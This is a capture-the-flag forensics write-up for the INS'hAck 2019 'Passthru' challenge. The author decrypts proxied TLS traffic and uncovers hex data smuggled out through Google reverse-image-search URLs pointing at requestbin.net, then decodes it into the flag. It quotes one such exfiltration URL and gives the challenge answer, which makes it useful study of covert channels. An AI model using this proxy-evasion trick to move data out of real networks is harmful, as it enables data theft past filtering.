Tuesday, May 7, 2019

INS'hAck 2019 - Passthru

by Renato "shrimpgo" Pacheco

Description

You’re part of a company security team and the admin has recently enabled interception on the company filtering proxy. The admin is pretty confident when it comes to its domain whitelist. He gave you a capture to review. Time to prove him wrong.


This challenge brought a pcap file called capture.pcap and a file called sslkey.log. Let’s see what is inside of capture.pcap:

$ tcpick -r capture.pcap
Starting tcpick 0.2.1 at 2019-05-04 22:34 -03
Timeout for connections is 600
tcpick: reading from capture.pcap
1      SYN-SENT       127.0.0.1:59408 > 127.0.0.1:8080
1      SYN-RECEIVED   127.0.0.1:59408 > 127.0.0.1:8080
1      ESTABLISHED    127.0.0.1:59408 > 127.0.0.1:8080
1      FIN-WAIT-1     127.0.0.1:59408 > 127.0.0.1:8080
1      FIN-WAIT-2     127.0.0.1:59408 > 127.0.0.1:8080
1      RESET          127.0.0.1:59408 > 127.0.0.1:8080
2      SYN-SENT       127.0.0.1:59410 > 127.0.0.1:8080
2      SYN-RECEIVED   127.0.0.1:59410 > 127.0.0.1:8080
2      ESTABLISHED    127.0.0.1:59410 > 127.0.0.1:8080
2      FIN-WAIT-1     127.0.0.1:59410 > 127.0.0.1:8080
2      FIN-WAIT-2     127.0.0.1:59410 > 127.0.0.1:8080
2      RESET          127.0.0.1:59410 > 127.0.0.1:8080
...

There is a lot of connections in localhost at destination port 8080. Inspecting some packets, I could see a client browsing on Internet by proxy, with all of traffic encrypted. So how can I decrypt this packets? Wireshark is sollution! Opening capture.pcap in Wireshark, it will be like this:

image

Load sslkey.log in SSL Protocol (Edit > Preferences... > Protocols > SSL):

image

Now I can see HTTP Requests in plaintext:

image

The main accesses were wikipedia.org, forensicswiki.org, docs.python.com, en.cppreference.com, www.bcc.com, nothing relevant BUT I found something odd between others access. Some access to images.google.com with requestbin.net, redirecting to www.google.com/search?tbs:sbi... I didn’t know what requestbin.net was, so I read about it:

image

RequestBin gives you a URL that will collect requests made to it and let you inspect them in a human-friendly way. Use RequestBin to see what your HTTP client is sending or to inspect and debug webhook requests.

Here an example:

https://images.google.com/searchbyimage?image_url=http%3A%2F%2Frequestbin.net%2Fr%2Fzk2s2ezk%3Fid%3D82290383-7480-487c-b78b-77ac769c56cd%26kcahsni%3D9ef773fe97f56554a3b4&encoded_image=&image_content=&filename=&hl=fr

Hum… Maybe if I access his requestbin ID zk2s2ezk I’ll find something.

image

Shit! It expired! What now? Keep looking at URL, I saw another clue. After id=... there was a parameter called kcahsni but, if you look closer, is a inshack in backwards! Cool! I got its content 9ef773fe97f56554a3b4 and translated to ASCII:

$ echo -n 9ef773fe97f56554a3b4 | xxd -r -p
��s���eT��

Nothing suspicious, but I’ll inspect others URLs. I made a filter on wireshark and extracted these packets (File > Extract Packets Dissections > Plaintext):

image

I wrote in file called exported.txt. Here are the steps that I made to come into hexes:

$ grep searchbyimage exported.txt | egrep -v "(Full request|Expert Info|GET)" | cut -d' ' -f11 > requests.txt
$ awk -F'%3D' '{print $3}' requests.txt | cut -d'&' -f1 | tr -d '\n' | xxd -r -p 
��s���eT��&��������rZ�9h�R�<
}e59ad3f38a01dca00f9759e6d205317642c5421fcdad034ebe7077c2bddd472b{ASNI
                                                                      2���l$���fg����(Ej�J�ơ.>�K

Hey! Look what I found! My suspicious were correct! Now just reverse the characters to get our flag:

$ echo "}e59ad3f38a01dca00f9759e6d205317642c5421fcdad034ebe7077c2bddd472b{ASNI" | rev
INSA{b274dddb2c7707ebe430dadcf1245c246713502d6e9579f00acd10a83f3da95e}

Flag: INSA{b274dddb2c7707ebe430dadcf1245c246713502d6e9579f00acd10a83f3da95e}

Capture the Flag , Forensics , Writeup